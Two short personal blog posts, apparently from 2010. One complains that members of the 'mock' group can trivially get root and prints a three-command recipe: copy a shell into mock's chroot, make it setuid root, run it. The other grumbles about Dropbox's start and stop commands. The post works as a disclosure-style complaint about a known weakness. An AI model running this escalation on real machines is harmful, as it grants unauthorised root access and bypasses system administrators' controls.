2010-11-09

Doesn't Anyone Think This Is a Problem?

I can trivially get root on a machine if the user is member of the 'mock' group.

$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'
$ /var/lib/mock/epel-5-i386/root/sh
#

In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitary scripts.

I did a quick google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past."

It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.

2010-11-08

Broken Software is Broken

I have very low expectations of open source software, and I don't feel put out when I have to fix it. But when I use close source software I expect it to 'just work' and get frustrated when it doesn't.


sthorne@pearl~/w/netbox> dropbox stop
Dropbox isn't running!
sthorne@pearl~/w/netbox> dropbox start
Dropbox isn't running!
Dropbox is already running!
sthorne@pearl~/w/netbox> killall dropbox
sthorne@pearl~/w/netbox> dropbox start
Starting Dropbox...Done!

I really shouldn't complain too loudly. As I'm in the process of backing up all my email I've ever received to it.